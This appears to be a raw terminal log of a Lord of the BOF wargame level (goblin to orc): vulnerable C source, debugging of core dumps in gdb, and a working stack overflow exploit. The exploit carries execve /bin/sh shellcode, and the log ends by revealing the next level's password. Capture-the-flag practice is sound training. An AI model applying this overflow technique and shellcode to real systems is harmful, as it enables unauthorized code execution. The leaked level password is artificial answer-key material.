wargame/Lord of Bof/goblin.txt

Connecting to 192.168.56.129:23...
Connection established.
To escape to local shell, press 'Ctrl+Alt+]'.
                                            _______________________
  _______________________-------------------                       `\
 /:--__                                                              |
||< > |                                   ___________________________/
| \__/_________________-------------------                         |
|                                                                  |
 |        The Lord of the BOF : The Fellowship of the BOF, 2010    |
 |                                                                  |
 |                                                                  |
  |       [enter to the dungeon]                                    |
  |       gate : gate                                                |
  |                                                                  |
  |       [RULE]                                                     |
   |      - do not use local root exploit                             |
   |      - do not use LD_PRELOAD to my-pass                          |
   |      - do not use single boot                    [h4ck3rsch001] |
  |                                              ____________________|_
  |  ___________________-------------------------                      `\
  |/`--_                                                                 |
  ||[ ]||                                            ___________________/
   \===/___________________-------------------------- 


login: goblin
Password: 
[goblin@localhost goblin]$ ls
orc  orc.c
[goblin@localhost goblin]$ cat orc.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - orc
        - egghunter
*/

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])
{
	char buffer[40];
	int i;

	if(argc < 2){
		printf("argv error\n");
		exit(0);
	}

	// egghunter 
	for(i=0; environ[i]; i++)
		memset(environ[i], 0, strlen(environ[i]));

	if(argv[1][47] != '\xbf')
	{
		printf("stack is still your friend.\n");
		exit(0);
	}

	strcpy(buffer, argv[1]); 
	printf("%s\n", buffer);
}
[goblin@localhost goblin]$ python -c 'print "A"*48+"\xbf\xbf\xbf\xbf"+"\x90"+"\xfd"
> ;
> `
> '
  File "<string>", line 2
    ;
    ^
SyntaxError: invalid syntax
[goblin@localhost goblin]$ python -c 'print "A"*48+"\xbf\xbf\xbf\xbf"+"\x90"+"\xfd"'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿ 
[goblin@localhost goblin]$ ./orc `python -c 'print "A"*48+"\xbf\xbf\xbf\xbf"+"\x90"+"\xfd"'`
stack is still your friend.
[goblin@localhost goblin]$ ./orc `python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"+"\x90"+"\xfd"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿ 
Segmentation fault
[goblin@localhost goblin]$ bash2
[goblin@localhost goblin]$ ls
orc  orc.c
[goblin@localhost goblin]$ cp orc ord
[goblin@localhost goblin]$ ./ord `python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"+"\x90"+"\xfd"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿ 
Segmentation fault (core dumped)
[goblin@localhost goblin]$ gdb -c core
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
Core was generated by `./ord AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿ 
Program terminated with signal 11, Segmentation fault.
#0  0xbfbfbfbf in ?? ()
(gdb) x/64 $esp
0xbffffaf0:	0x0000fd90	0xbffffb34	0xbffffb40	0x40013868
0xbffffb00:	0x00000002	0x08048450	0x00000000	0x08048471
0xbffffb10:	0x08048500	0x00000002	0xbffffb34	0x08048390
0xbffffb20:	0x0804860c	0x4000ae60	0xbffffb2c	0x40013e90
0xbffffb30:	0x00000002	0xbffffc2d	0xbffffc33	0x00000000
0xbffffb40:	0xbffffc66	0xbffffc77	0xbffffc8f	0xbffffcae
0xbffffb50:	0xbffffcd0	0xbffffcdc	0xbffffe9f	0xbffffebe
0xbffffb60:	0xbffffeda	0xbffffeef	0xbfffff0d	0xbfffff18
0xbffffb70:	0xbfffff31	0xbfffff40	0xbfffff48	0xbfffff52
0xbffffb80:	0xbfffff62	0xbfffff70	0xbfffff7e	0xbfffff8f
0xbffffb90:	0xbfffff9a	0xbfffffac	0xbfffffee	0x00000000
0xbffffba0:	0x00000003	0x08048034	0x00000004	0x00000020
0xbffffbb0:	0x00000005	0x00000006	0x00000006	0x00001000
0xbffffbc0:	0x00000007	0x40000000	0x00000008	0x00000000
0xbffffbd0:	0x00000009	0x08048450	0x0000000b	0x000001f7
0xbffffbe0:	0x0000000c	0x000001f7	0x0000000d	0x000001f7
(gdb) 
0xbffffbf0:	0x0000000e	0x000001f7	0x00000010	0x0fabfbff
0xbffffc00:	0x0000000f	0xbffffc28	0x00000000	0x00000000
0xbffffc10:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc20:	0x00000000	0x00000000	0x36383669	0x6f2f2e00
0xbffffc30:	0x41006472	0x41414141	0x41414141	0x41414141
0xbffffc40:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc50:	0x41414141	0x41414141	0x41414141	0xbf414141
0xbffffc60:	0x90bfbfbf	0x000000fd	0x00000000	0x00000000
0xbffffc70:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc80:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc90:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffca0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcb0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcc0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffcd0:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffce0:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) x/64 $esp-100
0xbffffa8c:	0x4005d920	0x400143e0	0xbffffaac	0x40066070
0xbffffa9c:	0x40106980	0x08048659	0xbffffabc	0x401081ec
0xbffffaac:	0xbffffae8	0x080485d3	0x08048659	0xbffffac0
0xbffffabc:	0x00000017	0x41414141	0x41414141	0x41414141
0xbffffacc:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffadc:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffaec:	0xbfbfbfbf	0x0000fd90	0xbffffb34	0xbffffb40
0xbffffafc:	0x40013868	0x00000002	0x08048450	0x00000000
0xbffffb0c:	0x08048471	0x08048500	0x00000002	0xbffffb34
0xbffffb1c:	0x08048390	0x0804860c	0x4000ae60	0xbffffb2c
0xbffffb2c:	0x40013e90	0x00000002	0xbffffc2d	0xbffffc33
0xbffffb3c:	0x00000000	0xbffffc66	0xbffffc77	0xbffffc8f
0xbffffb4c:	0xbffffcae	0xbffffcd0	0xbffffcdc	0xbffffe9f
0xbffffb5c:	0xbffffebe	0xbffffeda	0xbffffeef	0xbfffff0d
0xbffffb6c:	0xbfffff18	0xbfffff31	0xbfffff40	0xbfffff48
0xbffffb7c:	0xbfffff52	0xbfffff62	0xbfffff70	0xbfffff7e
(gdb) q
[goblin@localhost goblin]$ ./ord `python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"+"\x90"*100+"\xfd"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿ 
Segmentation fault (core dumped)
[goblin@localhost goblin]$ gdb -c core
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
Core was generated by `./ord AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿'.
Program terminated with signal 11, Segmentation fault.
#0  0xbfbfbfbf in ?? ()
(gdb) x/64 $esp-100
0xbffffa2c:	0x4005d920	0x400143e0	0xbffffa4c	0x40066070
0xbffffa3c:	0x40106980	0x08048659	0xbffffa5c	0x401081ec
0xbffffa4c:	0xbffffa88	0x080485d3	0x08048659	0xbffffa60
0xbffffa5c:	0x00000017	0x41414141	0x41414141	0x41414141
0xbffffa6c:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffa7c:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffa8c:	0xbfbfbfbf	0x90909090	0x90909090	0x90909090
0xbffffa9c:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffaac:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffabc:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffacc:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffadc:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffaec:	0x90909090	0x90909090	0xbfff00fd	0xbffffe9f
0xbffffafc:	0xbffffebe	0xbffffeda	0xbffffeef	0xbfffff0d
0xbffffb0c:	0xbfffff18	0xbfffff31	0xbfffff40	0xbfffff48
0xbffffb1c:	0xbfffff52	0xbfffff62	0xbfffff70	0xbfffff7e
(gdb) q
[goblin@localhost goblin]$ ./ord `python -c 'print "A"*44+"\x9c\xfa\xff\xbf"+"\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA󿐐1󿿐h//shh/bin⏓ኂ°
                                                            ̀ 
bash$ exit
exit
[goblin@localhost goblin]$ ./orc `python -c 'print "A"*44+"\x9c\xfa\xff\xbf"+"\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA󿐐1󿿐h//shh/bin⏓ኂ°
                                                            ̀ 
bash$ my-pass
euid = 504


cantata







bash$ exit
exit
[goblin@localhost goblin]$